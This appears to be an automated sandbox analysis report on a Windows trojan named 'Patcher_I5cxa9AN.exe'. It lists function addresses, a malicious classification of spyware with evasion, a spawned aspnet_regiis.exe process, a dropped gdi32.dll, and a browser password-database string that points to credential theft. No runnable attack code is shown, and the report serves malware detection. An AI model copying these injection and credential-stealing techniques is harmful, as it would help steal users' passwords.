Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CDE11F0	0_2_6CDE11F0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CDE3170	0_2_6CDE3170
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CDE3780	0_2_6CDE3780
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CDE3590	0_2_6CDE3590
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CDF2575	0_2_6CDF2575
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CDE27C0	0_2_6CDE27C0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE3CCF0	0_2_6CE3CCF0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE1B4C0	0_2_6CE1B4C0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE01C50	0_2_6CE01C50
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE02450	0_2_6CE02450
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE38C30	0_2_6CE38C30
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE3C5F0	0_2_6CE3C5F0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE155FE	0_2_6CE155FE
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE0FDD8	0_2_6CE0FDD8
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE06D72	0_2_6CE06D72
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CDFCD30	0_2_6CDFCD30
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE12EC0	0_2_6CE12EC0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE19EC0	0_2_6CE19EC0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CDFD6E0	0_2_6CDFD6E0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE0AEA4	0_2_6CE0AEA4
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE29EB0	0_2_6CE29EB0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE16660	0_2_6CE16660
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE1F649	0_2_6CE1F649
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE3CFC0	0_2_6CE3CFC0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE35FA0	0_2_6CE35FA0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE0DF80	0_2_6CE0DF80
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE1F796	0_2_6CE1F796
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CDFBF50	0_2_6CDFBF50
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CDFF760	0_2_6CDFF760
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CDFEF00	0_2_6CDFEF00
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE05706	0_2_6CE05706
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE02710	0_2_6CE02710
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE16F10	0_2_6CE16F10
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE040F0	0_2_6CE040F0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE348B0	0_2_6CE348B0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE1D029	0_2_6CE1D029
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE0B9E0	0_2_6CE0B9E0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE3C9F0	0_2_6CE3C9F0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE009C0	0_2_6CE009C0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE081D0	0_2_6CE081D0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE351D0	0_2_6CE351D0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE1B9B0	0_2_6CE1B9B0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE17170	0_2_6CE17170
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE12975	0_2_6CE12975
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE16A70	0_2_6CE16A70
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE063C7	0_2_6CE063C7
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CDFFBF0	0_2_6CDFFBF0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE02BA0	0_2_6CE02BA0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE21B80	0_2_6CE21B80
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE18B90	0_2_6CE18B90
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE3C370	0_2_6CE3C370
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE16320	0_2_6CE16320
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE39330	0_2_6CE39330
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE1033F	0_2_6CE1033F
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CDFC330	0_2_6CDFC330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C83BC0	2_2_72C83BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C7BB80	2_2_72C7BB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C4C306	2_2_72C4C306
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C81092	2_2_72C81092
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C48850	2_2_72C48850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C6E87F	2_2_72C6E87F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C831F0	2_2_72C831F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C4D972	2_2_72C4D972
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C657E1	2_2_72C657E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C68780	2_2_72C68780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C497A0	2_2_72C497A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C7BDD0	2_2_72C7BDD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C59AC0	2_2_72C59AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C60AC0	2_2_72C60AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C442E0	2_2_72C442E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C782F4	2_2_72C782F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C51AA4	2_2_72C51AA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C722A3	2_2_72C722A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C74AA0	2_2_72C74AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C70AB0	2_2_72C70AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C7B250	2_2_72C7B250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C5D260	2_2_72C5D260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C66270	2_2_72C66270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C753D3	2_2_72C753D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C69BDE	2_2_72C69BDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C54B80	2_2_72C54B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C66396	2_2_72C66396
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C7CBA0	2_2_72C7CBA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C6FBBB	2_2_72C6FBBB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C42B50	2_2_72C42B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C46360	2_2_72C46360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C7D36B	2_2_72C7D36B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C68B70	2_2_72C68B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C45B00	2_2_72C45B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C49310	2_2_72C49310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C5DB10	2_2_72C5DB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C5732C	2_2_72C5732C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C6732C	2_2_72C6732C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C6AB3C	2_2_72C6AB3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C620C0	2_2_72C620C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C838F0	2_2_72C838F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C82889	2_2_72C82889
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C660B0	2_2_72C660B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C49050	2_2_72C49050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C78811	2_2_72C78811
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C68030	2_2_72C68030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C7F830	2_2_72C7F830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C4B1A0	2_2_72C4B1A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C5C1BB	2_2_72C5C1BB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C6B910	2_2_72C6B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C6B111	2_2_72C6B111
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C43930	2_2_72C43930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C72EDE	2_2_72C72EDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C556D8	2_2_72C556D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C68E80	2_2_72C68E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C55E63	2_2_72C55E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C5D670	2_2_72C5D670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C82670	2_2_72C82670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C44E00	2_2_72C44E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C4CFC7	2_2_72C4CFC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C467F0	2_2_72C467F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C6978A	2_2_72C6978A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C5F790	2_2_72C5F790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C827B0	2_2_72C827B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C82F70	2_2_72C82F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C5CF20	2_2_72C5CF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C42F30	2_2_72C42F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C7FF30	2_2_72C7FF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C56F3F	2_2_72C56F3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C804D0	2_2_72C804D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C4ACF0	2_2_72C4ACF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C564F8	2_2_72C564F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C6F4A4	2_2_72C6F4A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C7B4B0	2_2_72C7B4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C6B40D	2_2_72C6B40D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C82410	2_2_72C82410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C63C29	2_2_72C63C29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C475C0	2_2_72C475C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C4EDD0	2_2_72C4EDD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C525E0	2_2_72C525E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C81DE1	2_2_72C81DE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C835F0	2_2_72C835F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C76D80	2_2_72C76D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C65DA0	2_2_72C65DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C75DB3	2_2_72C75DB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C625B0	2_2_72C625B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C6FD42	2_2_72C6FD42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C76558	2_2_72C76558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C59567	2_2_72C59567
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C5DD70	2_2_72C5DD70

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 72C54B70 appears 114 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 72C48060 appears 54 times
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: String function: 6CE01460 appears 54 times
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: String function: 6CDE7AD0 appears 33 times

Source: Patcher_I5cxa9AN.exe, 00000000.00000000.1643786311.0000000000312000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameUlyssesUlyssesFelix.lnkaFfH4 vs Patcher_I5cxa9AN.exe
Source: Patcher_I5cxa9AN.exe, 00000000.00000002.1656651240.000000000097E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Patcher_I5cxa9AN.exe
Source: Patcher_I5cxa9AN.exe	Binary or memory string: OriginalFilenameUlyssesUlyssesFelix.lnkaFfH4 vs Patcher_I5cxa9AN.exe

Source: Patcher_I5cxa9AN.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/2@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_72C7BDD0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

2_2_72C7BDD0

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe

File created: C:\Users\user\AppData\Roaming\gdi32.dll

Jump to behavior

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03

Source: Patcher_I5cxa9AN.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Patcher_I5cxa9AN.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: aspnet_regiis.exe, 00000002.00000003.1673153919.00000000053E8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1673447609.00000000053B5000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe "C:\Users\user\Desktop\Patcher_I5cxa9AN.exe"
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Patcher_I5cxa9AN.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Patcher_I5cxa9AN.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CDF2CA6 push ecx; ret	0_2_6CDF2CB9
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CE3B7B0 push eax; mov dword ptr [esp], 565150A3h	0_2_6CE3B7B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_72C823B0 push eax; mov dword ptr [esp], 565150A3h	2_2_72C823B4

Source: Patcher_I5cxa9AN.exe

Static PE information: section name: .text entropy: 7.023884578280009

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe

File created: C:\Users\user\AppData\Roaming\gdi32.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
